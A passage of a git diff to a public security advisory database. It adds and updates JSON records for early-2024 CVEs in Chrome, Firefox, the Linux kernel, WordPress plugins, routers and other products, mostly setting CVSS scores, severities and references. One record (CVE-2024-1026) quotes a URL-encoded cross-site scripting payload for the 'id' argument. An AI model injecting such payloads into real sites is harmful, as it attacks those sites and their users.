in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could interrupt the availability of the administration panel by sending multiple ICMP packets.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1014" + }, + { + "type": "WEB", + "url": "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json b/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json index 9ba4921374c01..3aab65d4b042e 100644 --- a/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json +++ b/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fppg-744g-mv5h", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0812" ], "details": "Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json b/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json index 7ee1ac6c7838f..406ea4da48dee 100644 --- a/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json +++ b/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fpqg-fv5v-vhpr", - "modified": "2024-01-26T00:30:28Z", + "modified": "2024-02-02T18:30:28Z", "published": "2024-01-26T00:30:28Z", "aliases": [ "CVE-2024-23055" ], "details": "An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T22:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-fq57-m32w-cmv5/GHSA-fq57-m32w-cmv5.json b/advisories/unreviewed/2024/01/GHSA-fq57-m32w-cmv5/GHSA-fq57-m32w-cmv5.json new file mode 100644 index 0000000000000..e2d2773b02a4a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-fq57-m32w-cmv5/GHSA-fq57-m32w-cmv5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq57-m32w-cmv5", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-22682" + ], + "details": "DuckDB <=0.9.2 and DuckDB extension-template <=0.9.2 are vulnerable to malicious extension injection via the custom extension feature.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22682" + }, + { + "type": "WEB", + "url": "https://github.com/Tu0Laj1/database_test" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-frvc-f98w-c5hr/GHSA-frvc-f98w-c5hr.json b/advisories/unreviewed/2024/01/GHSA-frvc-f98w-c5hr/GHSA-frvc-f98w-c5hr.json new file mode 100644 index 0000000000000..e2eafd2206ee8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-frvc-f98w-c5hr/GHSA-frvc-f98w-c5hr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frvc-f98w-c5hr", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22136" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder.This issue affects Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder: from n/a through 3.1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22136" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/droit-elementor-addons/wordpress-droit-elementor-addons-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json b/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json index f1062c27ff516..0d1e72a8c5259 100644 --- a/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json +++ b/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fw69-fp6v-v235", - "modified": "2024-01-25T15:31:53Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T15:31:53Z", "aliases": [ "CVE-2024-0879" diff --git a/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json b/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json new file mode 100644 index 0000000000000..32ad8e2e1b0f5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2f8-pfg4-3w3q", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24331" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setWiFiScheduleCfg function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24331" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/13/TOTOlink%20A3300R%20setWiFiScheduleCfg.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json b/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json index eb1171c282400..c46db49a4dd1e 100644 --- a/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json +++ b/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g343-63vq-2wq6", - "modified": "2024-01-28T03:30:35Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T03:30:35Z", "aliases": [ "CVE-2024-23738" ], "details": "An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T01:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json b/advisories/unreviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json deleted file mode 100644 index 425aca65101cd..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g4x3-mfpj-f335", - "modified": "2024-01-22T06:30:32Z", - "published": "2024-01-22T06:30:32Z", - "aliases": [ - "CVE-2023-52354" - ], - "details": "chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52354" - }, - { - "type": "WEB", - "url": "https://blitiri.com.ar/p/chasquid/relnotes/#113-2023-12-24" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-22T06:15:07Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json b/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json index 98684dac9e675..5dcb1c8fe761c 100644 --- a/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json +++ b/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20975" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0007/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json b/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json index c96c8fcc8c50a..af7dce6f41b56 100644 --- a/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json +++ b/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g5jr-34r4-rv4w", - "modified": "2024-01-27T03:30:21Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T03:30:21Z", "aliases": [ "CVE-2023-6482" @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-321", + "CWE-798" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-g6fv-wqqw-hppg/GHSA-g6fv-wqqw-hppg.json b/advisories/unreviewed/2024/01/GHSA-g6fv-wqqw-hppg/GHSA-g6fv-wqqw-hppg.json new file mode 100644 index 0000000000000..c972312d9f6e0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-g6fv-wqqw-hppg/GHSA-g6fv-wqqw-hppg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6fv-wqqw-hppg", + "modified": "2024-01-30T03:30:30Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-1026" + ], + "details": "A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1026" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252293" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252293" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-g78p-m98v-8prx/GHSA-g78p-m98v-8prx.json b/advisories/unreviewed/2024/01/GHSA-g78p-m98v-8prx/GHSA-g78p-m98v-8prx.json new file mode 100644 index 0000000000000..b474ca58a87ad --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-g78p-m98v-8prx/GHSA-g78p-m98v-8prx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g78p-m98v-8prx", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-46231" + ], + "details": "In Splunk Add-on Builder versions below 4.1.4, the application writes user session tokens to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46231" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2024-0110" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json b/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json index b1e5cd25f8fa4..0c60334b1d68e 100644 --- a/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json +++ b/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g89w-hcgw-6g9p", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0755" ], "details": "Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-gccg-f527-63v3/GHSA-gccg-f527-63v3.json b/advisories/unreviewed/2024/01/GHSA-gccg-f527-63v3/GHSA-gccg-f527-63v3.json new file mode 100644 index 0000000000000..7d73e6e263259 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-gccg-f527-63v3/GHSA-gccg-f527-63v3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gccg-f527-63v3", + "modified": "2024-02-06T18:30:19Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-49038" + ], + "details": "Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49038" + }, + { + "type": "WEB", + "url": "https://github.com/christopher-pace/CVE-2023-49038" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-gf6c-58rg-8pjj/GHSA-gf6c-58rg-8pjj.json b/advisories/unreviewed/2024/01/GHSA-gf6c-58rg-8pjj/GHSA-gf6c-58rg-8pjj.json new file mode 100644 index 0000000000000..3c2e911af1096 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-gf6c-58rg-8pjj/GHSA-gf6c-58rg-8pjj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gf6c-58rg-8pjj", + "modified": "2024-01-31T18:31:25Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-23502" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in InfornWeb Posts List Designer by Category – List Category Posts Or Recent Posts allows Stored XSS.This issue affects Posts List Designer by Category – List Category Posts Or Recent Posts: from n/a through 3.3.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23502" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/post-list-designer/wordpress-posts-list-designer-by-category-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-gf9w-j28x-vmch/GHSA-gf9w-j28x-vmch.json b/advisories/unreviewed/2024/01/GHSA-gf9w-j28x-vmch/GHSA-gf9w-j28x-vmch.json new file mode 100644 index 0000000000000..2d0967d76df49 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-gf9w-j28x-vmch/GHSA-gf9w-j28x-vmch.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gf9w-j28x-vmch", + "modified": "2024-02-03T00:31:32Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6503" + ], + "details": "The WP Plugin Lister WordPress plugin through 2.1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6503" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6503.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/0d95de23-e8f6-4342-b19c-57cd22b2fee2/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-gfh2-2mj9-m2cx/GHSA-gfh2-2mj9-m2cx.json b/advisories/unreviewed/2024/01/GHSA-gfh2-2mj9-m2cx/GHSA-gfh2-2mj9-m2cx.json new file mode 100644 index 0000000000000..8c40d7d9d1c23 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-gfh2-2mj9-m2cx/GHSA-gfh2-2mj9-m2cx.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfh2-2mj9-m2cx", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-1086" + ], + "details": "A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660" + }, + { + "type": "WEB", + "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json b/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json index 039d895223083..11d6b27046063 100644 --- a/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json +++ b/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gh6x-qpj6-x25r", - "modified": "2024-01-12T18:30:20Z", + "modified": "2024-02-06T12:30:30Z", "published": "2024-01-08T21:30:34Z", "aliases": [ "CVE-2023-51490" diff --git a/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json b/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json index ca4a057dbf78d..b9c61df99b46f 100644 --- a/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json +++ b/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ghrw-6hf4-xx3c", - "modified": "2024-01-24T06:30:18Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T06:30:18Z", "aliases": [ "CVE-2024-22366" ], "details": "Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T05:15:13Z" diff --git a/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json b/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json index 20406559f3bfb..c824cd857b3a8 100644 --- a/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json +++ b/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gpvq-2fxv-3pgq", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0742" ], "details": "It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json b/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json index a1ea006f76035..e6c6629f6421e 100644 --- a/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json +++ b/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gqqw-gq22-ww82", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2023-42937" ], "details": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. An app may be able to access sensitive user data.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -71,7 +74,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json b/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json index 900e7f576d42b..c591b9114c916 100644 --- a/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json +++ b/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json 